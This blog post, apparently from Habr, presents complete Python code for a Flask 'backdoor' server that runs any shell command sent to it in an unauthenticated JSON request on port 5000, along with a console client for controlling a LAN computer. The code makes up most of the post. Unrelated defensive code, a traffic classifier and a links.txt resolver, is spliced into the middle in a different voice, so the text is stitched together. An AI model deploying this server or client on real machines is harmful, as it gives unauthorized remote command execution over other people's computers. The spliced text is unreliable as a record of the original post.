A small backdoor in Flask, or how to control a computer on a local network

Hi Habr!

I recently watched a downloaded recording of the stream "How to create your own web application in Flask." And I decided to consolidate my knowledge in a project. For a long time I did not know what to write, and then the idea came to me: "Why not make a mini-backdoor in Flask?"

The first options for implementing the backdoor and its capabilities immediately appeared in my head. But I decided to quickly make a list of the backdoor's capabilities:

  1. Be able to open websites
  2. Have command-line access
  3. Be able to open programs, photos, videos

So, the first point is extremely easy to implement using the webbrowser module. I decided to implement the second point using the os module. The third is also done through the os module, but I will use "links" (more on that later).

Writing the server

So, *drumroll* the entire server code:

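from flask import Flask, request
import webbrowser
import os

app = Flask(__name__)


# Single endpoint: accepts a JSON body {'command': ..., 'data': ...}.
# There is no authentication; any host that can reach the port can call it.
@app.route('/mycomp', methods=['POST'])
def hell():
    json_string = request.json
    if json_string['command'] == 'test':
        return 'The server is running and waiting for commands...'
    if json_string['command'] == 'openweb':
        # Open https://www.<data> in the default browser
        webbrowser.open(url='https://www.' + json_string['data'], new=0)
        return 'Site opening ' + json_string['data'] + '...'
    if json_string['command'] == 'shell':
        # 'data' is passed to the system shell unchanged
        os.system(json_string['data'])
        return 'Command execution ' + json_string['data'] + '...'
    if json_string['command'] == 'link':
        # Select line number 'data' (1-based) from links.txt: full_path>description
        with open('links.txt', 'r') as links:
            for i in range(int(json_string['data'])):
                link = links.readline()
        link = link.rstrip('\n')
        os.system(link.split('>')[0])
        return 'Launch ' + link.split('>')[1]
    # Unknown command: return an explicit error instead of None
    return 'Unknown command', 400


if __name__ == '__main__':
    # 0.0.0.0 binds every interface; Flask's default port is 5000
    app.run(host='0.0.0.0')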

Now that I have dumped all the code, it is time to explain how it works.

All the code runs on the local computer on port 5000. To interact with the server, we have to send a JSON POST request.

JSON request structure:

{'command': 'somecommand', 'data': 'somedata'}

Well, it is logical that 'command' is the command we want to execute. And 'data' is the arguments of the command.

You can write and send JSON requests to interact with the server by hand (requests will help you). Or you can write a console client.
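The request shape described above is distinctive enough to match in captured traffic. The following is an added detection example, not code from the original post: classify parses a raw HTTP request and reports whether it carries the command/data envelope. The function names, the severity labels and the sample captures are assumptions constructed for illustration.

```python
import json

# Commands the server code on this page dispatches on.
KNOWN = {"test", "openweb", "shell", "link"}
# Assumed triage labels: 'shell' and 'link' reach os.system() on the server.
SEVERITY = {"shell": "high", "link": "high", "openweb": "medium", "test": "low"}


def parse_http_request(raw: bytes):
    """Split a captured HTTP/1.1 request into (method, path, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)  # ValueError if malformed
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def classify(raw: bytes):
    """Return a finding for a request carrying the command/data envelope, else None."""
    try:
        method, path, headers, body = parse_http_request(raw)
        msg = json.loads(body)
    except ValueError:  # bad request line, bad UTF-8 or bad JSON
        return None
    if method != "POST" or "json" not in headers.get("content-type", "").lower():
        return None
    if not isinstance(msg, dict) or set(msg) != {"command", "data"}:
        return None
    cmd = msg["command"]
    if not isinstance(cmd, str) or cmd not in KNOWN:
        return None
    return {"path": path, "command": cmd, "data": msg["data"],
            "severity": SEVERITY[cmd], "page_endpoint": path == "/mycomp"}


# Constructed sample captures (not real traffic).
HDR = b"Host: 192.168.1.2:5000\r\nContent-Type: application/json\r\n\r\n"
SAMPLES = [
    b"POST /mycomp HTTP/1.1\r\n" + HDR + b'{"command": "shell", "data": "whoami "}',
    b"POST /api/login HTTP/1.1\r\n" + HDR + b'{"user": "alice", "otp": "123456"}',
    b"POST /mycomp HTTP/1.1\r\n" + HDR + b'{"command": "test", "data": 0}',
    b"GET /mycomp HTTP/1.1\r\nHost: 192.168.1.2:5000\r\n\r\n",
]

if __name__ == "__main__":
    print([classify(sample) for sample in SAMPLES])
```

The match is on the envelope rather than the path, so a renamed endpoint is still reported; page_endpoint only records whether the path is the one used on this page.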

Writing the client

Code:

import requests

logo = ['\n\n',
        '******      ********',
        '*******     *********',
        '**    **    **     **',
        '**    **    **     **      Written on Python',
        '*******     **     **',
        '********    **     **',
        '**     **   **     **      Author: ROBOTD4',
        '**     **   **     **',
        '**     **   **     **',
        '********    *********',
        '*******     ********',
        '\n\n']

p = ''
iport = '192.168.1.2:5000'
host = 'http://' + iport + '/mycomp'

def test():
    dict = {'command': 'test', 'data': 0}
    r = requests.post(host, json=dict)
    if r.status_code == 200:
        print (r.content.decode('utf-8'))

def start():
    for i in logo:
        print(i)

start()
test()

while True:
    command = input('>')
    if command == '':
        continue
    a = command.split()
    if command == 'test':
        dict = {'command': 'test', 'data': 0}
        r = requests.post(host, json=dict)
        if r.status_code == 200:
            print (r.content.decode('utf-8'))
    if a[0] == 'shell':
        for i in range(1, len(a)):
            p = p + a[i] + ' '
        dict = {'command': 'shell', 'data': p}
        r = requests.post(host, json=dict)
        if r.status_code == 200:
            print (r.content.decode('utf-8'))
        p = ''
    if a[0] == 'link':
        if len(a) > 1:
            dict = {'command': 'link', 'data': int(a[1])}
            r = requests.post(host, json=dict)
            if r.status_code == 200:
                print (r.content.decode('utf-8'))
        else:
            print('Комманда не содержит аргументов!')  # "The command has no arguments!"
    if a[0] == 'openweb':
        if len(a) > 1:
            dict = {'command': 'openweb', 'data': a[1]}
            r = requests.post(host, json=dict)
            if r.status_code == 200:
                print (r.content.decode('utf-8'))
        else:
            print('Комманда не содержит аргументов!')  # "The command has no arguments!"
    if a[0] == 'set':
        if len(a) > 2 and a[1] == 'host':
            # Point the client at a new server IP (the port stays 5000)
            iport = a[2] + ':5000'
            host = 'http://' + iport + '/mycomp'
    if command == 'quit':
        break

Explanation:

First of all, the requests module is imported (for interacting with the server). Below that are the definitions of the start and test functions. And then comes the loop in which the magic happens. Have you read the code? Then you understand the meaning of the magic that happens in the loop. You enter a command and it is executed. Shell - commands for the command line (the logic is off the charts).

Test - check whether the server (backdoor) is running
Link - use a "shortcut"
Openweb - open a website
Quit - exit the client
Set - set the IP of your computer on the local network

And now more about link.

Next to the server there is a links.txt file. It contains links (full paths) to files (videos, photos, programs).

The structure looks like this:

full_path>description
full_path>description
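For incident response, the format above lets a links.txt recovered from a host be mapped back to logged link requests. The following is an added example, not code from the original post: resolve_link mirrors the way the server on this page selects a line and splits it, and inventory lists everything the link command could launch. The function names and the sample file contents are constructed.

```python
def resolve_link(links_text: str, data):
    """Return what a logged {'command': 'link', 'data': N} request launched.

    Mirrors the server on this page: N readline() calls select line N
    (1-based), the text before the first '>' goes to os.system(), and the
    second '>'-separated field is the description. Returns None when
    nothing would have run.
    """
    try:
        n = int(data)  # the server applies int() to 'data' as well
    except (TypeError, ValueError):
        return None
    lines = links_text.replace("\r\n", "\n").split("\n")
    if n < 1 or n > len(lines):
        return None
    fields = lines[n - 1].split(">")
    command = fields[0]
    if not command.strip():
        return None  # blank line or end of file: nothing to execute
    return {
        "line": n,
        "executed": command,
        "description": fields[1] if len(fields) > 1 else None,
        # A line without exactly one '>' still runs, but is worth a closer look.
        "well_formed": len(fields) == 2,
    }


def inventory(links_text: str):
    """List every entry the 'link' command can launch from this file."""
    count = len(links_text.split("\n"))
    found = (resolve_link(links_text, i) for i in range(1, count + 1))
    return [entry for entry in found if entry is not None]


# Constructed sample file contents (not from a real host).
LINKS_TXT = "\n".join([
    r"C:\Users\Public\Videos\demo.mp4>Demo video",
    r"C:\Windows\System32\calc.exe>Calculator",
    r"notepad.exe",
    "",
])

if __name__ == "__main__":
    for entry in inventory(LINKS_TXT):
        print(entry)
```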

Summary

We have a backdoor server for controlling a computer on a local network (within one Wi-Fi network). Technically, we can run the client from any device that has a Python interpreter.

P.S. I added the set command so that if the computer on the local network is assigned a different IP, it can be changed directly in the client.

Source: www.habr.com
